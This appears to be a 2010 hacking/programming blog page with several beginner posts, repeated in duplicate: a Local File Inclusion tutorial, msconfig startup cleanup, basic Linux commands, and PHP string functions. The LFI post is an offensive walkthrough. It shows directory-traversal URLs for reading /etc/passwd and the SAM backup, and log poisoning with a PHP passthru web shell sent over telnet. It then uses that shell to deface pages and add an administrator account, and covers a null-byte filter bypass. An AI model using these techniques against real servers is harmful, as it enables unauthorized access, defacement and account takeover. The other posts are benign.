Showing posts with label beginner. Show all posts
Showing posts with label beginner. Show all posts
Thursday 7 October 2010
Local File Inclusion [LFI] tutorial for beginners
Before, I have written an article on remote file inclusion (RFI) and this time, I am writing the article of LFI. So what is LFI? Its similar to RFI except that we are gonna include the file within the server rather than from another server. Sometimes, what happens is, we have allow_url_include setting is set to off on the webserver (On is by default) or there's somekind of filtration to check for things like http:// or www (though we can bypass these things). So in that condition, we may have to use LFI to own the server.
So lets again take example of vulnerable script:
Here we can see that the script doesn't check for which file to be included and hence, we are free to include any file by changing the 'page' GET variable value.
Lets put a quote at the end of URL and we see a pretty nice error like this:
So the script can't find the file profile.php' and hence errors. Now, lets try to include sensitive files that might be present in the webserver.
Two ../ shifts the current directory to two level down like cd../.. in command prompt. You may watch the error to find how many such dots you should use. But if you don't know how many such ../ you should use or don't want to waste time on finding how many steps you require, you may put enough such trails like about 10 to view these files like boot.ini or /etc/passwd as after reaching to the root folder like C:\, they can't go down anymore.
So you now know how to include sensitive files on the webserver. Now what if we need shell on the server.
Now, we throw some error to the logs of webserver that contain PHP code:
<?php passthru($_GET['cmd']); ?> or something similar to this. There are functions like system(), shell_exec(), exec(), etc. offered by PHP for executing system level commands.
The problem on injecting malicious code to log files is that we either need to inject through telnet or using codes. I have seen many sites with the perl codes for the purpose. Search it.
What we do is inject the code to log files of apache such as access.log or apache_error.log or php_error.log or on any other log file. Then we include the same log file in the vulnerable script and then execute system commands.
In my wampserver, I have:
There are various places you might want to watch and I'll be listing them at the end of tutorial.
Here I am gonna use telnet to throw the PHP code as error to the access.log file.
Now this is gonna get saved in the file access.log in my webserver and now I include it in the vulnerable script:
and any other commands you like.
This describes pretty much on owning the server. Now something extras I thought to include here:
Some developers think that they can ensure the inclusion of only valid php file by doing something like below:
// so looks like that it will include only the php files by ensuring the .php extension at the end. But if we add question mark (?) or nullbyte () by doing http://localhost/test.php?page=access.log, it would become something like:
include("access.log.php"); //now the scripts leaves anything behind the nullbyte and the file access.log is successfully included. And you can carry your usual pwnage.
Note that don't try to inject PHP code by sending malicious HTTP requests through your browser. It will be encoded and you won't be able to exploit.
Now finally the places you might want to watch on lfi:
etc/passwd
etc/group
etc/security/passwd
etc/security/group
apache/logs/access.log
apache/logs/error.log
var/log/access.log
etc.
You can find many other places to look after during your lfi by searching on the internet. Be creative and use your brain.
Hope you like it. Please comment it.
With Regards~
sam207
Read more...
So lets again take example of vulnerable script:
<?php
if (IsSet($_GET['page']))
include($_GET['page']);
?>
if (IsSet($_GET['page']))
include($_GET['page']);
?>
Here we can see that the script doesn't check for which file to be included and hence, we are free to include any file by changing the 'page' GET variable value.
Eg: www.victim.com/index.php?page=profile.php
Warning: include(profile.php) [function.include]: failed to open stream: No such file or directory in C:\wamp\www\test.php on line 2
Warning: include() [function.include]: Failed opening 'profile.php' for inclusion (include_path='.;C:\php5\pear') in C:\wamp\www\test.php on line 3
Warning: include() [function.include]: Failed opening 'profile.php' for inclusion (include_path='.;C:\php5\pear') in C:\wamp\www\test.php on line 3
So the script can't find the file profile.php' and hence errors. Now, lets try to include sensitive files that might be present in the webserver.
Eg: www.victim.com/index.php?page=../../boot.ini //boot.ini file in windoze
http://localhost/test.php?page=../../windows/system32/drivers/etc/hosts //hosts info file
http://localhost/test.php?page=../../../../etc/passwd //on Linux
http://localhost/test.php?page=../../windows/repair/sam //backup sam file
etc. and etc.
http://localhost/test.php?page=../../windows/system32/drivers/etc/hosts //hosts info file
http://localhost/test.php?page=../../../../etc/passwd //on Linux
http://localhost/test.php?page=../../windows/repair/sam //backup sam file
etc. and etc.
Two ../ shifts the current directory to two level down like cd../.. in command prompt. You may watch the error to find how many such dots you should use. But if you don't know how many such ../ you should use or don't want to waste time on finding how many steps you require, you may put enough such trails like about 10 to view these files like boot.ini or /etc/passwd as after reaching to the root folder like C:\, they can't go down anymore.
So you now know how to include sensitive files on the webserver. Now what if we need shell on the server.
Now, we throw some error to the logs of webserver that contain PHP code:
<?php passthru($_GET['cmd']); ?> or something similar to this. There are functions like system(), shell_exec(), exec(), etc. offered by PHP for executing system level commands.
The problem on injecting malicious code to log files is that we either need to inject through telnet or using codes. I have seen many sites with the perl codes for the purpose. Search it.
What we do is inject the code to log files of apache such as access.log or apache_error.log or php_error.log or on any other log file. Then we include the same log file in the vulnerable script and then execute system commands.
In my wampserver, I have:
http://localhost/test.php?page=../logs/access.log //for the log with site access infos.
There are various places you might want to watch and I'll be listing them at the end of tutorial.
Here I am gonna use telnet to throw the PHP code as error to the access.log file.
telnet localhost 80
GET /<? passthru($_GET['cmd']); ?> HTTP/1.1
GET /<? passthru($_GET['cmd']); ?> HTTP/1.1
Now this is gonna get saved in the file access.log in my webserver and now I include it in the vulnerable script:
So we do: http://localhost/test.php?page=../logs/access.log&cmd=dir //lists the directory
Now you may do any miserable works by writing cmd=any_system_level_commands like:
ls -lia
echo "HaCKeD BY sam207">index.*
net user sam207 mypass /add
net localgroup administrator sam207 /add
Now you may do any miserable works by writing cmd=any_system_level_commands like:
ls -lia
echo "HaCKeD BY sam207">index.*
net user sam207 mypass /add
net localgroup administrator sam207 /add
and any other commands you like.
This describes pretty much on owning the server. Now something extras I thought to include here:
Some developers think that they can ensure the inclusion of only valid php file by doing something like below:
<?php
if (IsSet($_GET['page']))
include($_GET['page'].".php");
?>
if (IsSet($_GET['page']))
include($_GET['page'].".php");
?>
// so looks like that it will include only the php files by ensuring the .php extension at the end. But if we add question mark (?) or nullbyte () by doing http://localhost/test.php?page=access.log, it would become something like:
include("access.log.php"); //now the scripts leaves anything behind the nullbyte and the file access.log is successfully included. And you can carry your usual pwnage.
Note that don't try to inject PHP code by sending malicious HTTP requests through your browser. It will be encoded and you won't be able to exploit.
Now finally the places you might want to watch on lfi:
etc/passwd
etc/group
etc/security/passwd
etc/security/group
apache/logs/access.log
apache/logs/error.log
var/log/access.log
etc.
You can find many other places to look after during your lfi by searching on the internet. Be creative and use your brain.
Hope you like it. Please comment it.
With Regards~
sam207
Read more...
Bookmark this post: | 
|
Saturday 2 October 2010
Removing the unwanted programs from startup
Many programs such as messengers and other utilities stick up to the startup. Because of the increase in the number of startup items in your system, the startup process might become slower gradually. Also, sometimes unnecessary programs and even virii and worms might be in the startup so it can come handy when you need to speed up your system.
There are different locations from where a program can run at startup. You can refer to my previous post HERE for the startup related information.
All the startup items entries is made on the microsoft configuration utility called msconfig which can be accessed by running the msconfig command through run box. Switch to the startup tab in the msconfig utility window which lists all the programs and shortcuts that run at the startup in the background.
From here, you can remove the unnecessary programs and virus/worms startup by unchecking them. Just be careful to work correctly and note that many virus/worms have the filename similar to that of the windows system files so you'll have to be careful while editing the startup from here.
Have fun. :)
Read more...
There are different locations from where a program can run at startup. You can refer to my previous post HERE for the startup related information.
All the startup items entries is made on the microsoft configuration utility called msconfig which can be accessed by running the msconfig command through run box. Switch to the startup tab in the msconfig utility window which lists all the programs and shortcuts that run at the startup in the background.
From here, you can remove the unnecessary programs and virus/worms startup by unchecking them. Just be careful to work correctly and note that many virus/worms have the filename similar to that of the windows system files so you'll have to be careful while editing the startup from here.
Have fun. :)
Read more...
Bookmark this post: |
|
Basic Linux Commands For Beginners [Part I]
I thought I would be sharing the different linux commands from basic to advanced so that the new linux users will be benefited so I'm starting this post and I'll continue to post more commands. This is the first one with the most basic commands to use in terminal.
Note that the linux commands are case-sensitive so be careful with the case while executing the commands.
Command to change directory
cd /home: This changes the current working directory to /home. The '/' indicates the path relative to root, and the directory will be changed to "/home", no matter what directory you are in when you execute this command.
cd samar: This changes the current working directory to samar, relative to the current location which is "/home". The full path of the new working directory is "/home/samar".
cd ..: This moves to the parent directory from the current directory. Hence on executing this command, our new directory will be "/home".
cd ~: This changes the current directory to the user's home directory which is "/home/samar" for the user "samar". The ~ indicates the home directory of the currently logged in user.
List the files and folders present in the current directory
ls: List the files and folders in the current working directory except those starting with . and only show the file name.
Using the different switches such as ls -lia, ls -al would output other more information such as ownership, chmod info, etc. of the files in the current directory.
concatenate files and send the contents to the standard output. This command comes quite handy in many cases and with the use of the redirection, we can send the contents to other outputs such as files and others.
cat /etc/passwd: sends the file content of the file "/etc/passwd" to the standard output i.e. monitor.
cat /etc/passwd>/home/samar/Desktop/pass.txt: writes the content of the "/etc/passwd" file to the "/home/samar/Desktop/pass.txt" file.
cat file1 file2 > file3.txt: concatenates the content of "file1" with that of "file2" and writes to "file3.txt"
For now, I will leave you to do some study on these commands. You can use man page or info to find more about these commands(I'll leave it for you to research). Have fun. :)
Read more...
Note that the linux commands are case-sensitive so be careful with the case while executing the commands.
cd
Command to change directory
cd /home: This changes the current working directory to /home. The '/' indicates the path relative to root, and the directory will be changed to "/home", no matter what directory you are in when you execute this command.
cd samar: This changes the current working directory to samar, relative to the current location which is "/home". The full path of the new working directory is "/home/samar".
cd ..: This moves to the parent directory from the current directory. Hence on executing this command, our new directory will be "/home".
cd ~: This changes the current directory to the user's home directory which is "/home/samar" for the user "samar". The ~ indicates the home directory of the currently logged in user.
ls
List the files and folders present in the current directory
ls: List the files and folders in the current working directory except those starting with . and only show the file name.
Using the different switches such as ls -lia, ls -al would output other more information such as ownership, chmod info, etc. of the files in the current directory.
cat
concatenate files and send the contents to the standard output. This command comes quite handy in many cases and with the use of the redirection, we can send the contents to other outputs such as files and others.
cat /etc/passwd: sends the file content of the file "/etc/passwd" to the standard output i.e. monitor.
cat /etc/passwd>/home/samar/Desktop/pass.txt: writes the content of the "/etc/passwd" file to the "/home/samar/Desktop/pass.txt" file.
cat file1 file2 > file3.txt: concatenates the content of "file1" with that of "file2" and writes to "file3.txt"
For now, I will leave you to do some study on these commands. You can use man page or info to find more about these commands(I'll leave it for you to research). Have fun. :)
Read more...
Bookmark this post: |
|
Wednesday 22 September 2010
Replacing All Instances of a Word in string [PHP]
PHP offers a useful function called str_replace() that can be used to replace every instance of a word in a string. This function takes three compulsory arguments and one optional argument.
The first argument represents the string to be replaced, the second the replacement value and the third the target string. The function returns the modified string.
Example:
Now, what if you want to work with arrays of words to replace with, for instance, in the censoring tasks. You can write some PHP stuff as below to perform the task.
Also, refer to the str_ireplace(), the case insensitive version of this function.
Hope this helps. :)
Edit: Thanks to cr4ck3r for the comments. Updated the post... :)
Read more...
The first argument represents the string to be replaced, the second the replacement value and the third the target string. The function returns the modified string.
Example:
<?php
function replace($string)
{
return str_replace("dog", "samar", $string);
}
$str = "I am dog so you call me dog";
echo $str;
echo "
".replace($str); //call replace function
?>
Output:
I am dog so you call me dog
I am samar so you call me samar
function replace($string)
{
return str_replace("dog", "samar", $string);
}
$str = "I am dog so you call me dog";
echo $str;
echo "
".replace($str); //call replace function
?>
Output:
I am dog so you call me dog
I am samar so you call me samar
Now, what if you want to work with arrays of words to replace with, for instance, in the censoring tasks. You can write some PHP stuff as below to perform the task.
<?php
function badword_censor($string)
{
$string = strtolower($string);
$badwords = array("fuck","bitch","cunt","faggot","penis","vagina","dick","pussy");
// add as per your requirement
$string = str_replace($badwords,"*censored*",$string);
return $string;
}
$str = "Fuck you bitch.";
//echo $str;
echo "
".badword_censor($str);
?>
Output:
*censored* you *censored*.
function badword_censor($string)
{
$string = strtolower($string);
$badwords = array("fuck","bitch","cunt","faggot","penis","vagina","dick","pussy");
// add as per your requirement
$string = str_replace($badwords,"*censored*",$string);
return $string;
}
$str = "Fuck you bitch.";
//echo $str;
echo "
".badword_censor($str);
?>
Output:
*censored* you *censored*.
Also, refer to the str_ireplace(), the case insensitive version of this function.
Hope this helps. :)
Edit: Thanks to cr4ck3r for the comments. Updated the post... :)
Read more...
Bookmark this post: |
|
Working with text case of PHP string
PHP provides number of functions to work with the case of the string. All these functions take the source string as their argument and return the modified string. The original source string will not be modified by any of these functions.
The PHP functions for working on case are:
strtolower() - Converts the entire string to lowercase
strtoupper() - Converts the entire string to uppercase
ucfirst() - Converts the first letter of the sentence to uppercase
ucwords() - Converts the first letter of every word in string to uppercase
<?php
//usage of ucfirst() function
$str = "i am samar";
$str = ucfirst($str);
echo $str;
?>
Output: I am samar
<?php
//usage of ucwords() function
$str = "i am samar";
$str = ucwords($str);
echo $str;
?>
Output: I Am Samar
<?php
//usage of strtoupper() function
//similarly use strtolower() function
$str = "i am samar";
$str = strtoupper($str);
echo $str;
?>
Output: I AM SAMAR
Read more...
The PHP functions for working on case are:
strtolower() - Converts the entire string to lowercase
strtoupper() - Converts the entire string to uppercase
ucfirst() - Converts the first letter of the sentence to uppercase
ucwords() - Converts the first letter of every word in string to uppercase
<?php
//usage of ucfirst() function
$str = "i am samar";
$str = ucfirst($str);
echo $str;
?>
Output: I am samar
<?php
//usage of ucwords() function
$str = "i am samar";
$str = ucwords($str);
echo $str;
?>
Output: I Am Samar
<?php
//usage of strtoupper() function
//similarly use strtolower() function
$str = "i am samar";
$str = strtoupper($str);
echo $str;
?>
Output: I AM SAMAR
Read more...
Bookmark this post: |
|
Subscribe to:
Posts (Atom)